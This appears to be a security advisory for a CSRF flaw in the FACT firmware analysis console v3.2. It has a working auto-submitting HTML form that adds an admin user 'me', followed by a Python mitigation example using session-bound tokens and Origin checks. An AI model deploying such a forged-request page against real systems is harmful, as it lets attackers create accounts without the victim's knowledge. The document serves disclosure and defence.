Attacks: CSRF

Product: Firmware Analysis and Comparison Tool

Affected Version(s): v3.2

Proof of Concept:

  1. The FACT web console allows CSRF attacks: state-changing POST requests (such as adding a user) are accepted without an anti-CSRF token.


  2. An attacker could host a web page that submits the HTTP request from a logged-in administrator's browser.

    <!-- Add new user: the form auto-submits to the console's user-management endpoint -->
    
    <html>
    <body>
    <!-- Target URL of the FACT admin user-management form (host from this report) -->
    <form id="CSRF" action="http://192.168.1.118:5000/admin/manage_users" method="POST">
    <input type="hidden" name="username" value="me" />
    <input type="hidden" name="password1" value="me" />
    <input type="hidden" name="password2" value="me" />
    </form>
    <script>
    	// Submit the form as soon as the page loads; the victim's session cookie is attached by the browser
    	document.getElementById('CSRF').submit();
    </script>
    </body>
    </html>
    


  3. A new user “me” has been added through the CSRF attack.

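Mitigation example. The following is an added illustration and not code from this report or from the FACT project: a stdlib-only Python model of the two defences that break the PoC above, a session-bound synchronizer token (which the attacker's page cannot read because of the same-origin policy) and an Origin/Referer check against the console's host. The `Request` class, `SERVER_HOST`, `SECRET_KEY`, the `csrf_token` field name and the `manage_users` handler are all assumptions made for the example; the host and port are taken from the PoC.

```python
"""Synchronizer-token plus Origin check for a form endpoint such as
/admin/manage_users. Added illustration, not FACT's own code."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Tuple
from urllib.parse import urlparse

# Assumption: a real application takes this from its configured secret key.
SECRET_KEY = secrets.token_bytes(32)
# Host the console is served on (value from the report's PoC).
SERVER_HOST = "192.168.1.118:5000"
# Constructed in-memory user store for the example.
USERS = set()


@dataclass
class Request:
    """Minimal stand-in for an HTTP request (constructed for the example)."""
    method: str
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)
    cookies: Dict[str, str] = field(default_factory=dict)


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session via HMAC, so a token leaked from one
    session is useless in another. Embedded in the console's own forms."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Constant-time comparison against the expected token for this session."""
    return hmac.compare_digest(issue_csrf_token(session_id), token or "")


def origin_allowed(headers: Dict[str, str]) -> bool:
    """Independent second check: a cross-site form post carries an Origin
    (or at least a Referer) naming the attacker's page, not the console."""
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False  # state-changing requests with neither header are refused
    return urlparse(source).netloc == SERVER_HOST


def manage_users(req: Request) -> Tuple[int, str]:
    """Hardened handler for the admin user-creation form."""
    if req.method != "POST":
        return 405, "method not allowed"
    session_id = req.cookies.get("session")
    if session_id is None:
        return 401, "not logged in"
    if not origin_allowed(req.headers):
        return 403, "cross-site request rejected (origin)"
    if not verify_csrf_token(session_id, req.form.get("csrf_token", "")):
        return 403, "cross-site request rejected (token)"
    if req.form.get("password1") != req.form.get("password2"):
        return 400, "passwords do not match"
    USERS.add(req.form["username"])
    return 200, "user created"


def demo() -> Tuple[int, int]:
    """Replay the PoC's forged request and a legitimate one; return both statuses."""
    victim_session = "sess-abc123"  # constructed session id
    # What the attacker's auto-submitting form produces: the browser attaches the
    # victim's cookie, but there is no token and Origin is the attacker's site.
    forged = Request("POST",
                     headers={"Origin": "http://attacker.example"},
                     form={"username": "me", "password1": "me", "password2": "me"},
                     cookies={"session": victim_session})
    # What the console's own page produces, with the token it rendered.
    legit = Request("POST",
                    headers={"Origin": "http://" + SERVER_HOST},
                    form={"username": "alice", "password1": "pw", "password2": "pw",
                          "csrf_token": issue_csrf_token(victim_session)},
                    cookies={"session": victim_session})
    return manage_users(forged)[0], manage_users(legit)[0]


if __name__ == "__main__":
    print(demo())  # forged request is refused, legitimate request succeeds
```

Either check alone stops the PoC; keeping both means a missing or stripped Origin header does not reopen the hole. Setting the session cookie with `SameSite=Lax` (or `Strict`) is a further browser-side layer, since the browser then omits the cookie from a cross-site POST altogether.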